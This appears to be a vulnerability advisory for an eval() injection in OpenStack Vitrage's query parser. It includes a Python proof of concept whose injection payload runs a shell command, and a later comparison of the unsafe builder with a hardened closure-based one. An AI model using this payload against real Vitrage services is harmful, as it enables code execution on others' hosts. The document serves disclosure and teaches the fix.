=============================================================================================================================================
| # Title    : OpenStack Vitrage < 12.0.1, 13.0.0, 14.0.0, 15.0.0 - Remote Code Execution via Unsafe eval() in the Query Parser |
| # Author   : indoushka                                                                                                         |
| # Tested on: Windows 11 Fr (Pro) / browser: Mozilla Firefox 147.0.4 (64 bits)                                                 |
| # Vendor   : https://www.openstack.org/                                                                                         |
=============================================================================================================================================

[+] Summary : CVE-2026-28370

A Remote Code Execution (RCE) vulnerability exists in the query parser of OpenStack Vitrage prior to versions 12.0.1, 13.0.0, 14.0.0, and 15.0.0.

The issue resides in the _create_query_function method located in:

    vitrage/graph/query.py

The vulnerability is caused by unsafe use of Python's eval() when the query predicate is built dynamically. User-controlled input supplied via the Vitrage API is embedded directly into a Python source string that is later executed with eval(). Because the input is only quoted, not parsed or escaped, a value containing a closing quote breaks out of the string literal and the remainder is executed as Python.

Impact: an authenticated user with Vitrage API access can inject arbitrary Python code, which in turn can run operating-system commands on the host running the Vitrage service, with the privileges of the Vitrage service account. No unauthenticated path is claimed here; the prerequisite is a valid API session.

[+] POC : https://www.youtube.com/watch?v=IjBH-hu3UfQ

The script below is a simplified, stand-alone reproduction of the vulnerable logic (it does not import Vitrage). It mirrors how the query dictionary is turned into a Python lambda through string concatenation and eval(). Running it writes the output of `id` to /tmp/hack.txt, demonstrating command execution from a query value.

    import os


    def _evaluable_str(value):
        """Wraps the value in single quotes if it's a string.

        This is the only "escaping" applied: a value that itself contains a
        single quote terminates the literal early.
        """
        if isinstance(value, str):
            return "'" + value + "'"
        return str(value)


    def create_predicate(query_dict):
        """Simplified version of the vulnerable logic.

        It builds a Python source string from the user-supplied query
        dictionary and passes it to eval().
        """
        key, val = list(query_dict['=='].items())[0]
        expression = f"(item.get('{key}') == {_evaluable_str(val)})"
        full_cmd = "lambda item: " + expression
        print(f"Executing built string: {full_cmd}")
        return eval(full_cmd)


    # The payload closes the string literal, appends an expression that runs a
    # shell command, and re-opens a string so the generated source stays valid:
    #   (item.get('ANY_KEY') == '') or __import__('os').system('id > /tmp/hack.txt') or ('')
    malicious_payload = "') or __import__('os').system('id > /tmp/hack.txt') or ('"

    query = {
        "==": {
            "ANY_KEY": malicious_payload
        }
    }

    try:
        match = create_predicate(query)
        # The injected code runs when the predicate is evaluated against an item.
        match({'ANY_KEY': 'Pwnd By indoushka'})
        print("\n[+] Success: Check /tmp/hack.txt for the command output.")
    except Exception as e:
        print(f"\n[-] Failed to execute: {e}")

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================
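The following is an added example, not part of the original advisory and not Vitrage's own code. It places the vulnerable string-plus-eval() construction next to a hardened equivalent that compiles the same query dictionary into Python closures, so that a query value is only ever compared as data and never interpolated into source text. The operator set (`==`, `!=`, `<`, `>`, `and`, `or`) and the exact dictionary shape are assumptions made for the illustration; the real Vitrage query language is wider. The injected payload used here is benign (it makes the predicate return a marker string instead of running a command) so the difference between the two builders can be observed without side effects.

```python
import operator

# Comparison operators supported by this illustration (an assumption about
# the query shape; the real Vitrage grammar is not reproduced here).
_OPS = {
    "==": operator.eq,
    "!=": operator.ne,
    "<": operator.lt,
    ">": operator.gt,
}

# Benign injection: closes the string literal, injects an expression that
# evaluates to the marker, then re-opens a string so the source stays valid.
# With the unsafe builder the generated source becomes:
#   lambda item: (item.get('k') == '') or 'INJECTED' or ('')
BENIGN_PAYLOAD = "') or 'INJECTED' or ('"


def create_predicate_unsafe(query_dict):
    """Vulnerable pattern: build Python source from user data and eval() it."""
    key, val = next(iter(query_dict["=="].items()))
    quoted = "'" + val + "'" if isinstance(val, str) else str(val)
    return eval(f"lambda item: (item.get('{key}') == {quoted})")


def create_predicate_safe(query_dict):
    """Hardened pattern: walk the query dict and return nested closures.

    Keys and values are captured as Python objects and compared with
    operator functions, so a value containing quotes or code is inert.
    """
    if not isinstance(query_dict, dict) or len(query_dict) != 1:
        raise ValueError("expected exactly one top-level operator")
    op_name, body = next(iter(query_dict.items()))

    if op_name in ("and", "or"):
        if not isinstance(body, list) or not body:
            raise ValueError(f"{op_name!r} expects a non-empty list")
        subs = [create_predicate_safe(q) for q in body]
        if op_name == "and":
            return lambda item: all(p(item) for p in subs)
        return lambda item: any(p(item) for p in subs)

    if op_name not in _OPS:
        raise ValueError(f"unsupported operator {op_name!r}")
    if not isinstance(body, dict) or len(body) != 1:
        raise ValueError("comparison expects exactly one field")
    compare = _OPS[op_name]
    key, expected = next(iter(body.items()))

    # The field name and expected value are closed over, never stringified
    # into source, so there is nothing for a payload to break out of.
    def predicate(item):
        return key in item and compare(item[key], expected)

    return predicate


if __name__ == "__main__":
    query = {"==": {"k": BENIGN_PAYLOAD}}
    item = {"k": "some-unrelated-value"}
    print("unsafe:", repr(create_predicate_unsafe(query)(item)))  # 'INJECTED'
    print("safe:  ", repr(create_predicate_safe(query)(item)))    # False
```

With the unsafe builder the predicate returns the injected marker for an item whose value does not match at all, proving that the query value was executed rather than compared; with the closure-based builder the same query only matches an item whose field literally equals the payload string. Vitrage's actual fix is not reproduced here; the point is that the query grammar should be interpreted by code that owns the operators, not by eval() over concatenated text.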